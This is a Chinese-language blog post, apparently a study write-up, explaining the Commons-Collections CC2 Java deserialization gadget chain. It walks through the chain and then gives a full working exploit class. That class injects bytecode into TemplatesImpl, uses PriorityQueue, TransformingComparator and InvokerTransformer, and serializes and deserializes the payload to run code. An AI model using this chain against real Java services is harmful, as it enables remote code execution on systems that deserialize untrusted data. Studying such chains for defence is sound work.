avatar

cindahy

A text-focused Halo theme

  • 首页
  • 文章分类
  • 项目
  • 关于
Home Java反序列化Commons-Collections篇06-CC2链
文章

Java反序列化Commons-Collections篇06-CC2链

Posted 2025-09-14 Updated 2025-09- 14
By Administrator
12~15 min read

前言

CC2链就是在CC4链的基础上做了少量修改,目的是避免使用了Transformer数组

CC2链就是在CC4链的基础上去除了通过InstantiateTransformer.transform调用TrAXFilter.TrAXFilte这一步骤,转而通过InvokerTransformer执行TemplatesImpl.newTransformer,从而实现加载动态加载恶意类。

构造链

首先TemplatesImpl.newTransformer到动态加载恶意类这一部分的链子是和CC4链一样的

        TemplatesImpl templates=new TemplatesImpl();

        Class c=templates.getClass();
        Field bytecodes=c.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
        byte[][]code={eval};
        bytecodes.set(templates,code);

        Field name=c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field tfactory=c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        templates.newTransformer();

然后再

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

在transformingComparator中传入一个无用的值,这里是为了延后恶意代码的执行时间,让它在反序列化的时候再执行。

PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);

将transformingComparator传入priorityQueue,因为priorityQueue在反序列化的时候会自动执行comparator.compare(),而transformingComparator.compare()会执行this.transformer.transform(obj1),而最后我们可以通过InvokerTransformer.transform()函数的

最终执行我们需要的templates.newTransformer();

priorityQueue.add(templates);
priorityQueue.add(templates);

我们在priorityQueue中加入templates,最后传到InvokerTransformer.transform(templates),执行templates.newTransformer();

        InvokerTransformer invokerTransformer=new InvokerTransformer<>("newTransformer",new Class[]{},new Object[]{});

        Class cl=TransformingComparator.class;
        Field in=cl.getDeclaredField("transformer");
        in.setAccessible(true);
        in.set(transformingComparator,invokerTransformer);

构造InvokerTransformer包含newTransformer,最后利用反射将invokerTransformer传入transformingComparator

exp

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC2 {
    public  static  void main(String []args)throws  Exception{

        TemplatesImpl templates=new TemplatesImpl();

        Class c=templates.getClass();
        Field bytecodes=c.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
        byte[][]code={eval};
        bytecodes.set(templates,code);

        Field name=c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field tfactory=c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);

        priorityQueue.add(templates);
        priorityQueue.add(templates);

        InvokerTransformer invokerTransformer=new InvokerTransformer<>("newTransformer",new Class[]{},new Object[]{});

        Class cl=TransformingComparator.class;
        Field in=cl.getDeclaredField("transformer");
        in.setAccessible(true);
        in.set(transformingComparator,invokerTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");


    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);

    }

    public  static  Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        ObjectInputStream ois=new ObjectInputStream(new FileInputStream(Filename));
        ois.readObject();
        return  ois;
    }
}

总结

java反序列化
java反序列化
License:  CC BY 4.0
Share

Further Reading

Oct 9, 2025

Java反序列化-RMI的几种攻击方式

RMI的基本攻击方式 RMI Client打RMI Registry RMI Client打RMI Server RMI Client 打RMI Registry 与注册中心的交互主要是这句话 Naming.bind("rmi://127.0.0.1:1099/sayHello", new Remo
Sep 28, 2025

Java反序列化-RMI流程分析

概述 官方文档:https://docs.oracle.com/javase/tutorial/rmi/overview.html RMI应用程序通常由两个独立的程序组成,一个服务器和一个客户端。服务端通过绑定这个远程对象类,它可以封装网络操作。客户端层面上只需要传递一个名字,还有地址。RMI提供了
Sep 21, 2025

Shiro反序列化漏洞-Shiro550

环境搭建 tomcat8.5.81 JDK1.7下载地址 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html 下载shrio对应的war包 https://github.com/jas502n/
OLDER

Java反序列化Commons-Collections篇05-CC4链

 NEWER

Java反序列化Commons-Collections篇07-CC5链

Recently Updated

  • 常见安全产品整理(防火墙,WAF,EDR)
  • ELK从入门到实践
  • bp+mumu模拟器app抓包
  • xray漏扫工具
  • Java反序列化-RMI的几种攻击方式

Trending Tags

安全运营 文件上传 php反序列化 xss csrf ssrf xxe sql php 白帽子讲web安全

Contents

©2025 cindahy. Some rights reserved.

Using the Halo theme Chirpy